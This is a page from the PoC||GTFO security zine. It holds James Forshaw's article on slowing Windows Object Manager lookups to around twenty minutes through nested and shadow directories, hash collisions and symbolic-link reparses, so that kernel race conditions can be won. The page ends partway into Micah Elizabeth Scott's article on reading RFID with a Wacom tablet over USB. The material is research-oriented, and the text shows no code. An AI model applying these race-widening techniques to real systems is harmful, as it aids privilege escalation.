PoC or GTFO, Volume 2 Page 35 Read online free by Manul Laphroaig

Home > Other > PoC or GTFO, Volume 2 > Page 35

PoC or GTFO, Volume 2 Page 35

13:3 How Slow Can You Go?

by James Forshaw

While researching Windows, I tend to find quite a few race condition vulnerabilities. Although these vulnerabilities can be exploited, you typically only get a tiny window of time in which to do it. The bug generally consists of the kernel first performing a security check, then accessing a resource, and then performing a secure action.

In exploitable cases the race is between the security check and the action. If we can modify the state of the system in between those actions, it might be possible to elevate privileges or do unexpected things. The time window is typically very small, but if the code is accessing some controllable resource in between the check and the action, we might still be able to create a very reliable exploit.

I wanted to find a way of increasing the time window to win the race in cases where the code accesses a resource we control. The following is an overview of the thought process I went through to come up with a working solution.

Object Manager Lookup Performance

Hidden under the hood of Windows NT is the Object Manager Namespace (OMN). You wouldn’t typically interact with it directly as the Win32 API for the most part hides it away. The NT kernel defines a set of objects, such as Files, Events, and Registry Keys, that can all have a name associated with them. The OMN provides the means to lookup these named objects. It acts like a file system; for example, you can specify a path to an NT system call such as BaseNamedObjectsMyEvent, and an event can be thus looked up.

There are two special object types in the OMN, Object Directories and Symbolic Links. Object Directories act as named containers for other objects, whereas Symbolic Links allow a name to be redirected to another OMN path. Symbolic Links are used quite a lot; for example, the Windows drive letters are really symbolic links to the real storage device. When we call an NT system call, the kernel must lookup the entire path, following any symbolic links until it either reaches the named object or fails to find a match.

In this exploit we want to make the process of looking up a resource we control as slow as possible. For example, if we could make it take one or two seconds, then we’ve got a massive window of opportunity to win the race condition. Therefore I want to find a way of manipulating the Object Manager lookup process in such a way that we achieve this goal. I am going to present my approach to achieving the required result.

A note about my setup: for my testing I am going to open a named Event object. All testing is done on my 2.8GHz Xeon workstation. Although it has twenty physical cores, the lookup process won’t be parallelized, and therefore that shouldn’t be an issue. Xeons tend to have more L2/L3 cache than consumer processors, but if anything this should only make our timings faster. If I can get a long lookup time on my workstation, it should be possible on pretty much anything else running Windows. This was all tested on an up-to-date Windows 10 machine; however, not much has changed since Windows 7 that might affect the results.

First let’s just measure the time it takes to do a normal lookup. We’ll repeat the lookup a thousand times and take the average. The results are probably what we’d expect: the lookup process for a simple named Event is roughly 3μs. That includes the system call transition, lookup process, and the access check on the Event object. Although in theory you could win a race, it seems pretty unlikely, even on a multi-core processor. So let’s think about a way of improving the lookup time. (And when I say “improve,” I mean making the lookup time slower.)

An Object Manager path is limited to the maximum string size afforded by the UNICODE_STRING structure.

We can see that the Length member is an unsigned 16 bit integer, limiting the maximum length to 216 – 1. This, however, is a byte count, so in fact we are limited to half that many characters. From this result, there are two obvious possible approaches we can take:

Make a path that contains one very long name. The lookup process would have to compare the entire name using a typical string comparison operation to verify it’s accessing the correct object. This should take linear time relative to the length of the string.

Make multiple small, named directories nested withing eachother. E.g., AAAA...EventName. The assumption here is that each lookup takes a fixed amount of time to complete. This operation will again take linear time relative to the depth of recursion of the directories.

Now it would seem likely that the cost of the entire operation of a single lookup will be worse than a string comparison, a primitive that is typically optimized quite heavily. At this point we have not had to look at any actual kernel code, and we won’t start quite yet, so instead empirical testing seems the way to go.

Let’s start with the first approach, making a long string and performing a lookup on it. Our name limit is around 32,767, although we’ll need to be able to make the object in a writable directory such as BaseNamedObject, which reduces the length slightly, but not enough to make significant impact. Therefore, we’ll perform the Event opening on names between one and 32,000 characters in length.

Although this is a little noisy, our assumption of linear lookup time seems correct. The longer the string, the longer it takes to look it up. For a 32,000 character long string, this seems to top out at roughly 90μs. That’s not enough to be useful, but it’s certainly a start.

Now let’s instead look at the recursive directory approach. In this case the upper bound is around 16,000 directories. This is because each path component must contain a backslash and a single character name (i.e. AAA...). Therefore our maximum path limit is half the character length. Of course we’d make the assumption that the time to go through the lookup process is going to be greater than the time it takes to compare four Unicode characters, but let’s test to make sure. The results are shown on page 650.

Well, I think that’s unequivocal. For 16,000 recursive depth, the average lookup time is around 3,700μs, forty times longer than the long path name lookup result. Now, of course, this comes with downsides. For a start, you need to create thousands of directory objects in the kernel. At least on a modern 64 bit Windows this isn’t likely to be too taxing, however it’s still worth bearing in mind. Also the process must maintain a handle to each of those directories, because otherwise they’d be deleted, as a normal user cannot make kernel objects permanent. Fortunately our handle limit for a single process is of the order of 16 million.

Now, will 3,700μs be enough for us? It’s certainly orders of magnitude greater than 3μs, but can we do better? We’ve now run out of path space, we’ve filled the absolute maximum allowed string length with recursive directory names. What we want is a method of multiplying that effect without requiring a longer path. We can do this by using Object Manager symbolic links. By placing the symbolic link as the last component of the long path we can force the kernel to reparse and start the lookup all over again. On the final lookup we’ll just point the symbolic link to the target.

Ultimately though we can only do this 64 times. We can’t do this indefinitley for a fairly obvious reason: each time a symbolic link is encountered the kernel restarts the parsing processes. If you pointed a symbolic link at itself, you’d end up in an infinite loop, except that a reparse limit of 64. The results are as we expected, the time taken to lookup our event is proportional to both the number of symbolic links and the number of recursive directories. For 64 symbolic links and 16,000 directories it takes approximately 200ms. At around a fifth of a second, that should be enough, but I’m greedy. How can we make the lookup time even worse?

At this point it’s time to break out the disassembler and see how the lookup process works under the hood in the kernel. First off, let’s see what an object directory structure looks like. We can dump it from a kernel debugging session using WinDBG with the command dt nt!_OBJECT_DIRECTORY. Converted back to a C-style structure, it looks something like this.

Based on the presence of the HashBucket field, it’s safe to assume that the kernel is using a hash table to store directory entri
es. This makes some sense, because if the kernel just maintained a list of directory entries, that would be pretty poor for performance. With a hash table the lookup time is much reduced as long as the hashing algorithm does a good job of reducing collisions. As we’re trying to increase the cost of lookups, we can intentionally add entries with collisions to make the lookup process take the worst case time, which is linear relative to the number of entries in a directory. This again provides us with another scaling factor, and in this case the number of entries is only going to be limited by available memory, as we are never going to need to put the name into the path.

So what’s the algorithm for the hash? The main function of interest is ObpLookupObjectName, which is referenced by functions such as ObReferenceObjectByName. The directory entry logic is buried somewhere in this large function; however, fortunately there’s a helper function ObpLookupDirectoryEntryEx, which has the same logic that is smaller and easier to reverse.12 (Figure 13.9.)

So the hashing algorithm is pretty simple; it repeatedly mixes the bits of the current hash value and then adds the uppercase Unicode character to the hash. We could work out a clever way of getting hash collisions from this, but actually it’s pretty simple. The object manager allows us to specify names containing null characters, therefore if we take our target name, say ‘A’, and prefix it with increasing length strings containing only null, we get both hash and bucket collisions. This limits us to creating only 32,000 or so colliding entries before we run out of strings to create them, but, as we’ll see in a minute, that’s not a problem. Let’s look at the results of doing this for a single directory.

Figure 13.9: ObpLookupDirectoryEntryEx()

Yet again, a nice linear graph. For a given collision count it’s nowhere near as good as the recursive directory approach, but it is a multiplicative factor in the lookup time, which we can abuse. So you’d think we can now easily apply this to all our 16,000 recursive directories, add in symbolic links, and probably get an insane lookup time. Yes, we would, however there’s a problem, insertion time. Every time we add a new entry to a directory, the kernel must do a lookup to check that the entry doesn’t already exist. This means that, for every entry we add, we must do (n — 1)2 checks in the hash bucket just to find that we don’t have the entry before we insert it. This means that the time to add a new entry is approximately proportional to the square of the number of entries. Sure it’s not a cubic or exponential increase, but that’s hardly a consolation. To prove that this is the case we can just measure the insertion time.

That graph shows a pretty clear n2 trend for the insertion time. If, say, we wanted to create a directory entry with 16,000 collisions, it takes almost six seconds. If we wanted to then do that for all 16,000 recursive directory entries, it would take an entire day! Now, I think we’re going a bit over the top here, but by fiddling with the values we can get something that doesn’t take too long to set up and gives us a long lookup time. I’m still greedy, though; I want to see how far I can push the lookup time. Is there any way we can get the best of all worlds?

The final piece of the puzzle is to bring in Shadow directories, which allow the Object Manager a fallback path if it can’t find an entry in a directory. You can use almost any other Object Manager directory as a shadow, which will allow us to control the lookup behavior. Shadow directories have a crucial difference from symbolic links, as they don’t cause a reparse to occur in the lookup process. This means they’re not restricted to the 64 reparse limit. As each lookup consumes a path component, eventually there will be no more paths to lookup. If we put together two directories, we can pass a similar path to our recursive directory lookup, without actually creating all the directories.

So how does this actually work? If we open a path of the form AAAAA..., the kernel will first lookup the initial ‘A’ directory. This is the directory on the left of the diagram. It will then try to open the next ‘A’ directory, which is on the right, which again it will find. Next the kernel again looks up ‘A’, but in this case it doesn’t exist. As the directory has a shadow link to its parent, it looks there instead, finds the same ‘A’ directory, and repeats the process. This will continue until we run out of path elements to lookup.

So let’s determine the performance of this approach. We’d perhaps expect it to be less performant relative to actually creating all those directories if only because of the cache effects of the processor. Hopefully it won’t be too far behind.

Looks good. Yes, the performance is lower than actually creating the directories, but once we bring collisions into the mix, that’s not really going to matter much. So the final result is that instead of creating 16,000 directories with 16,000 collisions we can do it with just two directories, which is far more manageable and takes just eleven seconds on my workstation. So, to sign off, let’s combine everything together.

16,000 path components using two object directories in a shadow configuration.

16,000 collisions per directory.

64 symbolic link reparsings.

And the resulting time for a single lookup on my workstation is nearly twenty minutes! I think we might just be able to win the race condition with that. Code examples can be found attached to this document.13

After all that effort we can make the kernel take nineteen minutes to lookup a single controlled resource path. That’s pretty impressive. We have many options to get the kernel to start the lookup process, allowing us to use not just files and registry keys but almost any named event. It’s a typical tale of unexpected behavior when facing pathological input, and it’s not really surprising that Microsoft wouldn’t optimize for this use case.

13:4 A USB Glitching Attack; or, Reading RFID by ROP and Wacom

by Micah Elizabeth Scott

Greetings, neighbors!

Today, like most days, I would like to celebrate the diversity of tiny machines around us. This time I’ve prepared a USB magic trick of sorts, incorporating techniques from the analog and the digital domains.

Regular readers will be well aware that computer peripherals are typically general-purpose computers themselves, and the operating system often trusts them a little too much. Devices attached to Thunderbolt (PCI Express) are trusted as much as the CPU. Devices attached to USB, at best, are as privileged as the user, who can typically do anything they want albeit slowly and using interfaces designed for meat.14 If that USB device can exploit a bug in literally any available driver, the device could achieve even more direct levels of control.

Not only are these peripherals small computers with storage and vulnerabilities and secrets, they typically have very direct access to their own hardware. It’s often firmware’s responsibility to set up clocks, program power converters, and process analog signals. Projects like BadUSB have focused on reprogramming a USB device to attack the computer they’re attached to. What about using the available low-level peripherals in ways they weren’t intended?

I recently made a video, a “Graphics Tablet Primer for Hackers,” going into some detail on how a pen tablet input device actually works. I compared the electromagnetic power and data transfer to the low-frequency RFID cards still used by many door access control systems. At the time this was just a convenient didactic tool, but it did start me wondering just how hard it would be to use a graphics tablet to read 125 kHz RFID cards.

I had somewhat arbitrarily chosen a Wacom CTE-450 (Bamboo Fun) tablet for this experiment. I had one handy, and I’d already done a little preliminary reversing on its protocol and circuit design. It’s old enough that it didn’t seem to use any custom Wacom silicon, recent enough to be both cheap and plentiful on the second-hand market.

A Very Descriptive Descriptor

Typically you need firmware to analyze a device. Documented interfaces are the tip of the iceberg. To really see what a device is capable of, you need to see everything the firmware knows how to do. Sometimes this is easy to get. Back in PoC‖GTFO 7:3, when I was reversing an optical drive,
the firmware was plainly available from the manufacturer’s web site. Usually you won’t be so lucky. Manufacturers often encrypt firmware to hide their crimes or slow down clones, and some devices don’t appear to support firmware updates at all.

This device seemed to be the latter kind. No firmware updates online. No hints of a firmware updating process hidden in their drivers. The CPU was something I didn’t recognize at first. I posted the photo to Twitter, and Lady Ada recognized it as a Sanyo/ONsemi LC87, an 8-bit micro that seems to be mostly used in Japanese consumer electronics. It comes in both flash and ROM versions, both of which I would later find in these tablets. Test points were available for an on-chip debugger, but I couldn’t find the debug adapter for sale anywhere nor could I find any documentation for the protocol. I even found the firmware for this mysterious TCB87-TypeC debug adapter, and a way to disassemble it, but the actual debug port was implemented by a custom peripheral on the adapter’s CPU. I tried various bit twiddling and pulse pushing in hopes of getting a response from the debug port, but my best guess is that it’s been disabled.

At this point, the remaining options are more direct. A sufficiently funded and motivated researcher could certainly break out the micropositioners and acid, reading the data directly from on-chip busses. But this is needlessly complex and expensive. This is a USB device after all, and we have a perfectly good off-chip bus that can already do many things. In fact, when you attach a USB device to your PC, it typically hands very small pieces of its firmware back to the PC in order to identify itself. We think of these USB Descriptors as data tables, not part of the firmware at all, but where else would they be stored? On an embedded device where RAM is so precious, the descriptor chunks will be copied directly from Flash or Mask ROM into the USB endpoint buffer. It’s a tiny engine designed to read parts of firmware out over USB, and nearly every USB device has code like this.

‹ Prev Next ›